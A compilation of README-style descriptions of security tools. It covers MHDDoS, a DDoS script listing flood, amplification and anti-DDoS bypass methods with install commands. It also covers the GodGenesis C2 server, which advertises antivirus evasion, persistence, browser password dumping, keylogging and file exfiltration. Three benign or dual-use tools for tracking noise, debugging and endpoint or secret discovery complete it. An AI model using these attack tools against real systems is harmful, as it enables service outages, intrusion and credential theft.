
MHDDoS - DDoS Attack Script With 56 Methods



Best DDoS Attack Script (Python3), Cyber/DDoS Attack With 56 Methods.

Please don't attack websites without the owner's consent.




Features And Methods

  • Layer7
    • GET | GET Flood
    • POST | POST Flood
    • OVH | Bypass OVH
    • RHEX | Random HEX
    • STOMP | Bypass chk_captcha
    • STRESS | Send HTTP Packet With High Byte
    • DYN | A New Method With Random SubDomain
    • DOWNLOADER | A New Method Of Reading Data Slowly
    • SLOW | Slowloris Old Method Of DDoS
    • HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
    • NULL | Null UserAgent and ...
    • COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
    • PPS | Only 'GET / HTTP/1.1\r\n\r\n'
    • EVEN | GET Method With More Headers
    • GSB | Google Project Shield Bypass
    • DGB | DDoS Guard Bypass
    • AVB | Arvan Cloud Bypass
    • BOT | Like Google Bot
    • APACHE | Apache Exploit
    • XMLRPC | WP XMLRPC Exploit (add /xmlrpc.php)
    • CFB | CloudFlare Bypass
    • CFBUAM | CloudFlare Under Attack Mode Bypass
    • BYPASS | Bypass Normal AntiDDoS
    • BOMB | Bypass With codesenberg/bombardier
    • KILLER | Run Many Threads To Kill A Target
    • TOR | Bypass Onion Website
  • Layer4:
    • TCP | TCP Flood Bypass
    • UDP | UDP Flood Bypass
    • SYN | SYN Flood
    • CPS | Open And Close Connections With Proxy
    • ICMP | ICMP Echo Request Flood (Layer3)
    • CONNECTION | Keep Open Connections Alive With Proxy
    • VSE | Send Valve Source Engine Protocol
    • TS3 | Send TeamSpeak 3 Status Ping Protocol
    • FIVEM | Send FiveM Status Ping Protocol
    • MEM | Memcached Amplification
    • NTP | NTP Amplification
    • MCBOT | Minecraft Bot Attack
    • MINECRAFT | Minecraft Status Ping Protocol
    • MCPE | Minecraft PE Status Ping Protocol
    • DNS | DNS Amplification
    • CHAR | Chargen Amplification
    • CLDAP | CLDAP Amplification
    • ARD | Apple Remote Desktop Amplification
    • RDP | Remote Desktop Protocol Amplification
  • ⚙️ Tools - Run With python3 start.py tools
    • CFIP | Find Real IP Address Of Websites Powered By Cloudflare
    • DNS | Show DNS Records Of Sites
    • TSSRV | TeamSpeak SRV Resolver
    • PING | PING Servers
    • CHECK | Check Website Status
    • DSTAT | Show Bytes Received, Bytes Sent And Their Amount
  • Other
    • STOP | STOP All Attacks
    • TOOLS | Console Tools
    • HELP | Show Script Usage

If you like the project, leave a star on the repository!

Downloads

You can download it from GitHub Releases

Getting Started

Requirements


Videos

Tutorial


Documentation

You can read it from GitHub Wiki

Clone and Install Script

git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt

One-Line Installing on Fresh VPS

apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt




PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking


PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your Linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud's behaviour according to your needs.


  • Simple. 3 files only, no installation required; just clone this repo and you're ready to go.
  • Powerful. Thread-based navigation.
  • Stealthy. Optimized to emulate user navigation.
  • Portable. You can use this script on every unix-based OS.

This project was inspired by noisy.py


How It Works

  1. URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files)
  2. If the proxy flag has been used, the proxy config is tested
  3. For each URL in the URL list a thread is started, and each thread has a user agent associated with it
  4. Each thread starts by sending an HTTP request to the given URL
  5. The response is filtered using the keywords in order to prevent 404s and malformed URLs
  6. A new URL is chosen from the list generated after filtering
  7. The current thread sleeps for a random time
  8. Steps 4 to 7 are repeated with the new URL until the user sends a kill signal (CTRL-C or the Enter key); a minimal sketch of this loop follows below
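For illustration, here is a minimal Python sketch of one engine thread following those steps (PartyLoud itself is a Bash script; the names, regex and blocklist below are illustrative, not the real implementation):

import random
import re
import time
import urllib.request

BADWORDS = [".css", ".jpg", ".png", "logout"]  # stand-in for the badwords file

def fetch_links(url, user_agent):
    # Step 4: send an HTTP request with this engine's user agent
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    html = urllib.request.urlopen(req, timeout=10).read().decode(errors="ignore")
    # Step 5: filter with the keyword blocklist to avoid 404s and malformed URLs
    links = re.findall(r'href="(https?://[^"]+)"', html)
    return [l for l in links if not any(bad in l for bad in BADWORDS)]

def engine(start_url, user_agent):
    url = start_url
    while True:  # Step 8: repeat until the user sends a kill signal
        links = fetch_links(url, user_agent)
        url = random.choice(links) if links else start_url  # Step 6
        time.sleep(random.uniform(1, 30))                   # Step 7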

Features

  • Configurable URL list and blocklist
  • Random DNS mode: each request is made through a different DNS server
  • Multi-threaded request engine (the number of threads equals the number of URLs in partyloud.conf)
  • Error recovery mechanism to protect engines from failures
  • Spoofed user agents prevent fingerprinting (each engine has a different user agent)
  • Dynamic UI

Setup

Clone the repository:

git clone https://github.com/realtho/PartyLoud.git

Navigate to the directory and make the script executable:

cd PartyLoud
chmod +x partyloud.sh

Run 'partyloud':

./partyloud.sh

Usage

Usage: ./partyloud.sh [options...]

-d --dns <file> DNS servers are sourced from the specified FILE;
each request will use a different DNS server
from the list
!!WARNING THIS FEATURE IS EXPERIMENTAL!!
!!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list <file> read URL list from the specified FILE
-b --blocklist <file> read blocklist from the specified FILE
-p --http-proxy <http://ip:port> set an HTTP proxy
-s --https-proxy <https://ip:port> set an HTTPS proxy
-n --no-wait disable the wait between one request and another
-h --help display this help
To stop the script press either Enter or CTRL-C

 
File Specifications

In the current release there is no input validation on files.
If you find bugs or have suggestions on how to improve these features, please help me by opening issues on GitHub.

Intro

If you don't have special needs, the default config files are just fine to get you started.

Default files are located in:

Please note that file names and extensions are not important; only the content of the files matters.

badwords - Keywords-based blocklist

badwords is a keyword-based blocklist used to filter out non-HTML content: images, documents and so on.
The default config has been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copying and modifying the default config according to your needs.
Here are some hints on how to create a great blocklist file:

DO ✅
  • Use only ASCII chars
  • Try to keep the rules as general as possible
  • Prefer relative paths

DON'T ❌
  • Define one-site-only rules
  • Define case-sensitive rules
  • Place more than one rule per line

partyloud.conf - URL List

partyloud.conf is a URL list used as the starting point for the fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside from suggesting that you avoid Google, YouTube and social-network links, I've really no hints for you.

Note #1 - To work properly the URLs must be well-formed
Note #2 - Even if the file contains 1000 lines, only 10 are used (the first 10; work on randomness is in progress)
Note #3 - Only one URL per line is allowed

DNSList - DNS List

DNSList is a list of DNS servers used as the argument for the random DNS feature. Random DNS is not enabled by default, so the default file is really just a guideline and a test used while developing the feature to see if everything worked as expected.
The only suggestion here is to add as many addresses as possible to increase randomness.

Note #1 - Only one address per line is allowed

PenguinTrace - Tool To Show How Code Runs At The Hardware Level


penguinTrace is intended to help build an understanding of how programs run at the hardware level. It provides a way to see what instructions compile to, and then step through those instructions and see how they affect machine state as well as how this maps back to variables in the original program. A bit more background is available on the website.

penguinTrace starts a web-server which provides a web interface to edit and run code. Code can be developed in C, C++ or Assembly. The resulting assembly is then displayed and can then be stepped through, with the values of hardware registers and variables in the current scope shown.

penguinTrace runs on Linux and supports the AMD64/X86-64 and AArch64 architectures. penguinTrace can run on other operating systems using Docker, a virtual machine or through the Windows Subsystem for Linux (WSL).


The primary goal of penguinTrace is to allow exploring how programs execute on a processor; the development also provided an opportunity to explore how debuggers work and some lower-level details of interaction with the kernel.

Note: penguinTrace allows running arbitrary code as part of its design. By default it will only listen for connections from the local machine. It should only be configured to listen for remote connections on a trusted network and should not be exposed to the internet. This can be mitigated by running penguinTrace in a container, and a limited degree of isolation of stepped code can be provided when libcap is available.

Getting Started

Prerequisites

penguinTrace requires 64-bit Linux running on a X86-64 or AArch64 processor. It can also run on a Raspberry Pi running a 64-bit (AArch64) Linux distribution. For other operating systems, it can be run on Windows 10 using the Windows Subsystem for Linux (WSL) or in a Docker container. WSL does not support tracee process isolation.

python
clang
llvm
llvm-dev
libclang-dev
libcap-dev # For containment

Building

To build penguinTrace outside of a container, clone the repository and run make. The binaries will be placed in build/bin by default.

To build penguinTrace in Docker, run docker build -t penguintrace github.com/penguintrace/penguintrace.

Running

Once penguinTrace is built, running the penguintrace binary will start the server.

If built in a container it can then be run with docker run -it -p 127.0.0.1:8080:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace. See Containers for details on better isolating the container.

Then navigate to 127.0.0.1:8080 or localhost:8080 to access the web interface.

Note: In order to run on port 80, you can modify the docker run command to map from port 8080 to port 80, e.g. -p 127.0.0.1:80:8080.

If built locally, you can modify the binary to allow it to bind to port 80 with sudo setcap CAP_NET_BIND_SERVICE=+ep penguintrace. It can then be run with penguintrace -c SERVER_PORT 80

penguinTrace defaults to port 8080 as it is intended to be run as an unprivileged user.

Temporary Files

The penguinTrace server uses the system temporary directory as a location for compiled binaries and environments for running traced processes. If the PENGUINTRACE_TMPDIR environment variable is defined, this directory will be used. It will fall back to the TMPDIR environment variable and finally the directories specified in the C library.

This must correspond to a directory without noexec set; if running in a container, the filesystem will likely have this set by default.
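As a rough sketch of that resolution order (penguinTrace itself is C++; this is just the lookup logic expressed in Python):

import os
import tempfile

def resolve_tmpdir():
    # PENGUINTRACE_TMPDIR first, then TMPDIR, then the platform default
    return (os.environ.get("PENGUINTRACE_TMPDIR")
            or os.environ.get("TMPDIR")
            or tempfile.gettempdir())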

Networking

By default penguinTrace only listens on the loopback device and IPv4. If the server is configured to listen on all addresses, then also setting the server to IPv6 will allow connections on both IPv4 and IPv6; this is the default mode when running in a Docker container.

This is because penguinTrace only creates a single thread to listen to connections and so can currently only bind to a single address or all addresses.

Session Handling

By default penguinTrace runs in multiple session mode, each time code is compiled a new session is created. The URL fragment (after the '#') of the UI is updated with the session id, and this URL can be used to reconnect to the same session.

If running in single session mode each penguinTrace instance only supports a single debugging instance. The web UI will automatically reconnect to a previous session. To support multiple sessions, multiple instances should be launched which are listening on different ports.

Containers

The docker_build.sh and docker_run.sh scripts provide an example of how to run penguinTrace in a Docker container. Dockerfile_noisolate provides an alternative way of running that does not require the SYS_ADMIN capability but provides less isolation between the server and the traced processes. The SYS_PTRACE capability is always required for the server to trace processes. misc/apparmor-profile provides an example AppArmor profile that is suitable for running penguinTrace but may need some customisation for the location of temporary directories and compilers.

AArch64 / Raspberry Pi

penguinTrace will only run under a 64-bit operating system. The official operating systems provided for the Raspberry Pi are all 32-bit; to run penguinTrace, something such as pi64 or Arch Linux Arm is required.

Full instructions for setting up a 64-bit OS on Raspberry Pi TBD.

Authors

penguinTrace is developed by Alex Beharrell.

License

This project is licensed under the GNU AGPL. A non-permissive open source license is chosen as the intention of this project is educational, and so any derivative works should have the source available so that people can learn from it.

The bundling of the source code relies on the structure of the repository. Derivative works that are not forked from a penguinTrace repository will need to modify the Makefile rules for static/source.tar.gz to ensure the modified source is correctly distributed.

Acknowledgements

penguinTrace makes use of jQuery and CodeMirror for some aspects of the web interface. Both are licensed under the MIT License. It also uses the Major Mono font which is licensed under the Open Font License.



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • get them from a Burp project (pass location of a Burp XML file)
  • get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies † Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers † Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth † The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes † Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout † How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent † What User Agents to get links for, e.g. -u desktop mobile
-insecure Whether TLS certificate checks should be disabled when making requests (default: false)
-s429 Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO Stop when > 95 percent of requests time out (default: false)
-sCE Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size † The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over this, the file will be ignored (default: 500 MB). Setting it to 0 means no files will be ignored, regardless of size.
-replay-proxy For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they contain only ASCII characters. This can be useful when you know the target is likely to use only ASCII characters and you are getting a number of false positives from binary files.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses' Content-Type headers are checked against. Any responses with these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML † - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results to relevant domains only (this can be a file or in-scope domains). Also, you can pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents; there could be specific endpoints related to the user agent given. Giving a depth value (-d) will keep sending requests to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from files in a directory - Basic

If you have files, e.g. JS files, HTTP responses, etc., you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search (by highlighting the scope, for example), right click and select Save selected items. Ensure that the base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results to relevant domains only.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search (by highlighting the History, for example), click the Report menu and select Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.
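Taken together, the two notes above amount to a simple first-line sniff, sketched below in Python (the exact checks inside xnLinkFinder may differ):

import re

def sniff_input_type(path):
    # Guess the input type from the first line, per the notes above (illustrative)
    with open(path, "r", errors="ignore") as f:
        first_line = f.readline().strip()
    if first_line.startswith("<?xml"):
        return "burp"  # Burp XML export
    if re.match(r"^==== \d+ ==========", first_line):
        return "zap"   # OWASP ZAP ASCII message file
    return "other"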

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request can be made to that URL to search for more links. If a file of domains is passed using -sp then the output will include each domain followed by /path/to/example.js, increasing the chance of finding more links (see the sketch after this list).
  • If you use -sp but still want the original link /path/to/example.js (without a domain) additionally returned in the output, then pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d), be wary that some sites use dynamic links and it will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the stop flags (-s429, -s403, -sTO, -sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d) value is high) and have limited resources, the program will stop when it reaches the memory threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could serve different links to different user agent groups, then specify -u desktop mobile for example (separated with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.
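To make the -sp behaviour described above concrete, here is a hedged Python sketch of the prefixing idea (apply_scope_prefix is an illustrative name, not xnLinkFinder's actual code):

def apply_scope_prefix(link, prefixes):
    # Root-relative links get one output line per scope domain
    if link.startswith("/"):
        return [p.rstrip("/") + link for p in prefixes]
    return [link]

# apply_scope_prefix("/path/to/example.js", ["http://www.target.com"])
# -> ["http://www.target.com/path/to/example.js"]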

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

/XNL-h4ck3r


JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets


JSubFinder is a tool written in Golang to search webpages and JavaScript for hidden subdomains and secrets in the given URL. Developed with bug bounty hunters in mind, JSubFinder takes advantage of Go's amazing performance, allowing it to work through large data sets and be easily chained with other tools.
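JSubFinder itself is written in Go, but the core idea (scanning fetched JavaScript for in-scope hostnames) can be sketched in a few lines of Python; the regex and function name below are illustrative, not JSubFinder's actual implementation:

import re

def find_subdomains(js_text, root_domain):
    # Pull hostnames ending in root_domain out of JavaScript text
    pattern = re.compile(r"[a-zA-Z0-9][a-zA-Z0-9._-]*\." + re.escape(root_domain))
    return {m.group(0) for m in pattern.finditer(js_text)}

# find_subdomains(open("app.js").read(), "google.com")
# -> {"apis.google.com", "ogs.google.com", ...}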


Install

Install the application and download the signatures needed to find secrets

Using GO:

go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml

or

Downloads Page

Basic Usage

Search

Search the given URLs for subdomains and secrets

$ jsubfinder search -h

Execute the command specified

Usage:
JSubFinder search [flags]

Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URLs, not just JavaScript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Amount of threads to be used (default 5)
-u, --url strings Url to check

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console

Examples (results are the same in this case):

$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search

apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com

With Secrets Enabled

Note: --secrets="" will save the secret results in a secrets.txt file

$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com

Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com

Advanced examples

$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
  • -crawl use the default crawler to crawl pages for other URLs to analyze
  • -s enables JSubFinder to search for secrets
  • -S Silence output to console
  • -o <file> save output to specified file
  • -t 10 use 10 threads
  • -g search every URL for JS, even ones we don't think have any

Proxy

Enables an upstream HTTP proxy with TLS MITM support. This allows you to:

  1. Browse sites in real time and have JSubFinder search for subdomains and secrets as you browse.
  2. If needed, run JSubFinder on another server to offload the workload.
$ JSubFinder proxy -h

Execute the command specified

Usage:
JSubFinder proxy [flags]

Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings URLs in scope separated by commas, e.g. www.google.com,www.netflix.com
-u, --upstream-proxy string Address of upstream proxy, e.g. http://127.0.0.1:8888 (default "http://127.0.0.1:8888")

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com

With Burp Suite

  1. Configure Burp Suite to forward traffic to an upstream proxy (User Options > Connections > Upstream Proxy Servers > Add)
  2. Run JSubFinder in proxy mode

Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to Burp, and in another thread search for subdomains and secrets.

With Proxify

  1. Launch Proxify & dump traffic to a folder proxify -output logs
  2. Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their github page)
  3. Launch JSubFinder in proxy mode & set the upstream proxy as Proxify jsubfinder proxy -u http://127.0.0.1:8443
  4. Use Proxify's replay utility to replay the dumped traffic to jsubfinder replay -output logs -burp-addr http://127.0.0.1:8444

Run on another server

Simple: run JSubFinder in proxy mode on another server, e.g. 192.168.1.2. Follow the proxy steps above, but set your application's upstream proxy to 192.168.1.2:8443.

Advanced Examples

$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
  • --scope limits JSubFinder to only analyze responses from www.reddit.com
  • -p port JSubFinder's proxy server is running on
  • -S silence output to the console/stdout
  • -o <file> output results to this file


GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server coded purely in Python3, created to help Red Teamers and Penetration Testers. Currently it only supports TCP reverse shells, but wait a minute, it's FUD and can give you an admin shell from any targeted Windows machine.


The List Of Commands It Supports:

===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show These Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompt Returns To C2 Server
clear --> Clear The Previous Outputs

===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --> Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directory Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

===================================================================================================
INFORMATION GATHERING COMMANDS:
===================================================================================================
env --> Checks Environment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc


===================================================================================================
EXPLOITATION COMMANDS:
===================================================================================================
persistence1 --> Persistence Via Method 1
persistence2 --> Persistence Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Browser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI


